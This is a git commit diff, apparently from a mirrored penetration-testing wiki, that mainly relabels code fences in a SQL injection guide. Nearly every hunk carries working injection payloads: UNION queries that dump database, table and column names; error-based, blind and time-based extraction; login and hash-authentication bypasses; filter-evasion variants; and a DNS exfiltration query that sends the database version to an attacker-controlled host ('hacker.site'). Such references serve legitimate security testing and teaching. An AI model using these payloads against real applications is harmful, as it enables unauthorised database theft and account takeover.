GitBook: [master] 491 pages modified
This commit is contained in:
parent
cd106b9c33
commit
4f109e4e87
@ -154,7 +154,7 @@ Two methods are typically used for this purpose:
|
||||
|
||||
Keep incrementing the number until you get a False response. Even though GROUP BY and ORDER BY have different functionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query.
|
||||
|
||||
```text
|
||||
```sql
|
||||
1' ORDER BY 1--+ #True
|
||||
1' ORDER BY 2--+ #True
|
||||
1' ORDER BY 3--+ #True
|
||||
@ -162,7 +162,7 @@ Keep incrementing the number until you get a False response. Even though GROUP B
|
||||
#-1' UNION SELECT 1,2,3--+ True
|
||||
```
|
||||
|
||||
```text
|
||||
```sql
|
||||
1' GROUP BY 1--+ #True
|
||||
1' GROUP BY 2--+ #True
|
||||
1' GROUP BY 3--+ #True
|
||||
@ -174,7 +174,7 @@ Keep incrementing the number until you get a False response. Even though GROUP B
|
||||
|
||||
Select more and more null values until the query is correct:
|
||||
|
||||
```text
|
||||
```sql
|
||||
1' UNION SELECT null-- - Not working
|
||||
1' UNION SELECT null,null-- - Not working
|
||||
1' UNION SELECT null,null,null-- - Worked
|
||||
@ -186,7 +186,7 @@ _You should use `null`values as in some cases the type of the columns of both si
|
||||
|
||||
On the next examples we are going to retrieve the name of all the databases, the table name of a database, the column names of the table:
|
||||
|
||||
```text
|
||||
```sql
|
||||
#Database names
|
||||
-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata
|
||||
|
||||
@ -204,7 +204,7 @@ _There is a different way to discover this data on every different database, but
|
||||
If for some reason you **cannot** see the **output** of the **query** but you can **see the error messages**, you can make this error messages to **ex-filtrate** data from the database.
|
||||
Following a similar flow as in the Union Based exploitation you could manage to dump the DB.
|
||||
|
||||
```text
|
||||
```sql
|
||||
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
||||
```
|
||||
|
||||
@ -213,7 +213,7 @@ Following a similar flow as in the Union Based exploitation you could manage to
|
||||
In this case you cannot see the results of the query or the errors, but you can **distinguished** when the query **return** a **true** or a **false** response because there are different contents on the page.
|
||||
In this case, you can abuse that behaviour to dump the database char by char:
|
||||
|
||||
```text
|
||||
```sql
|
||||
?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A'
|
||||
```
|
||||
|
||||
@ -221,7 +221,7 @@ In this case, you can abuse that behaviour to dump the database char by char:
|
||||
|
||||
This is the **same case as before** but instead of distinguish between a true/false response from the query you can **distinguish between** an **error** in the SQL query or not \(maybe because the HTTP server crashes\). Therefore, in this case you can force an SQLerror each time you guess correctly the char:
|
||||
|
||||
```text
|
||||
```sql
|
||||
AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
|
||||
```
|
||||
|
||||
@ -229,7 +229,7 @@ AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
|
||||
|
||||
In this case there **isn't** any way to **distinguish** the **response** of the query based on the context of the page. But, you can make the page **take longer to load** if the guessed character is correct. We have already saw this technique in use before in order to [confirm a SQLi vuln](./#confirming-with-timing).
|
||||
|
||||
```text
|
||||
```sql
|
||||
1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')#
|
||||
```
|
||||
|
||||
@ -243,7 +243,7 @@ You can use stacked queries to **execute multiple queries in succession**. Note
|
||||
|
||||
If **no-other** exploitation method **worked**, you may try to make the **database ex-filtrate** the info to an **external host** controlled by you. For example, via DNS queries:
|
||||
|
||||
```text
|
||||
```sql
|
||||
select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
|
||||
```
|
||||
|
||||
@ -270,13 +270,13 @@ List to try to bypass the login functionality:
|
||||
|
||||
When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.
|
||||
|
||||
```text
|
||||
```sql
|
||||
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
|
||||
```
|
||||
|
||||
Allowing an attacker to craft a string with a `true` statement such as `' or 'SOMETHING`
|
||||
|
||||
```text
|
||||
```sql
|
||||
md5("ffifdyop", true) = 'or'6<>]<5D><>!r,<2C><>b<EFBFBD>
|
||||
```
|
||||
|
||||
@ -284,7 +284,7 @@ Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.
|
||||
|
||||
### Hash Authentication Bypass
|
||||
|
||||
```text
|
||||
```sql
|
||||
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
|
||||
```
|
||||
|
||||
@ -299,7 +299,7 @@ You should use as username each line of the list and as password always: _**Pass
|
||||
|
||||
IF ' is being scaped you can use %A8%27, and when ' gets scaped it will be created: 0xA80x5c0x27 \(_╘'_\)
|
||||
|
||||
```text
|
||||
```sql
|
||||
%A8%27 OR 1=1;-- 2
|
||||
%8C%A8%27 OR 1=1-- 2
|
||||
%bf' or 1=1 -- --
|
||||
@ -318,7 +318,7 @@ print r.text
|
||||
|
||||
### Polyglot injection \(multicontext\)
|
||||
|
||||
```text
|
||||
```sql
|
||||
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
||||
```
|
||||
|
||||
@ -344,7 +344,7 @@ More info: [https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideu
|
||||
|
||||
Add as much `','',''` as you consider to exit the VALUES statement. If delay is executed, you have a SQLInjection.
|
||||
|
||||
```text
|
||||
```sql
|
||||
name=','');WAITFOR%20DELAY%20'0:0:5'--%20-
|
||||
```
|
||||
|
||||
@ -384,24 +384,24 @@ With this technique you can extract information creating only 1 account. It is i
|
||||
|
||||
Using **hex2dec** and **substr**:
|
||||
|
||||
```text
|
||||
```sql
|
||||
'+(select conv(hex(substr(table_name,1,6)),16,10) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
|
||||
```
|
||||
|
||||
To get the text you can use:
|
||||
|
||||
```text
|
||||
```python
|
||||
__import__('binascii').unhexlify(hex(215573607263)[2:])
|
||||
```
|
||||
|
||||
Using **hex** and **replace** \(and **substr**\):
|
||||
|
||||
```text
|
||||
```sql
|
||||
'+(select hex(replace(replace(replace(replace(replace(replace(table_name,"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
|
||||
|
||||
'+(select hex(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
|
||||
|
||||
Full ascii uppercase and lowercase replace:
|
||||
#Full ascii uppercase and lowercase replace:
|
||||
'+(select hex(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%"),"z","&"),"J","'"),"K","`"),"L","("),"M",")"),"N","@"),"O","$$"),"Z","&&")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
|
||||
```
|
||||
|
||||
@ -411,8 +411,8 @@ Routed SQL injection is a situation where the injectable query is not the one wh
|
||||
|
||||
Example:
|
||||
|
||||
```text
|
||||
Hex of: -1' union select login,password from users-- a
|
||||
```sql
|
||||
#Hex of: -1' union select login,password from users-- a
|
||||
-1' union select 0x2d312720756e696f6e2073656c656374206c6f67696e2c70617373776f72642066726f6d2075736572732d2d2061 -- a
|
||||
```
|
||||
|
||||
@ -420,7 +420,7 @@ Hex of: -1' union select login,password from users-- a
|
||||
|
||||
No Space \(%20\) - bypass using whitespace alternatives
|
||||
|
||||
```text
|
||||
```sql
|
||||
?id=1%09and%091=1%09--
|
||||
?id=1%0Dand%0D1=1%0D--
|
||||
?id=1%0Cand%0C1=1%0C--
|
||||
@ -431,13 +431,13 @@ No Space \(%20\) - bypass using whitespace alternatives
|
||||
|
||||
No Whitespace - bypass using comments
|
||||
|
||||
```text
|
||||
```sql
|
||||
?id=1/*comment*/and/**/1=1/**/--
|
||||
```
|
||||
|
||||
No Whitespace - bypass using parenthesis
|
||||
|
||||
```text
|
||||
```sql
|
||||
?id=(1)and(1)=(1)--
|
||||
```
|
||||
|
||||
@ -451,7 +451,7 @@ SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELE
|
||||
|
||||
Blacklist using keywords - bypass using uppercase/lowercase
|
||||
|
||||
```text
|
||||
```sql
|
||||
?id=1 AND 1=1#
|
||||
?id=1 AnD 1=1#
|
||||
?id=1 aNd 1=1#
|
||||
@ -471,7 +471,7 @@ WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())
|
||||
|
||||
{% embed url="https://github.com/m4ll0k/Atlas" caption="" %}
|
||||
|
||||
## Other GUIDES
|
||||
## Other Guides
|
||||
|
||||
* [https://sqlwiki.netspi.com/](https://sqlwiki.netspi.com/)
|
||||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)
|
||||
|
Loading…
Reference in New Issue
Block a user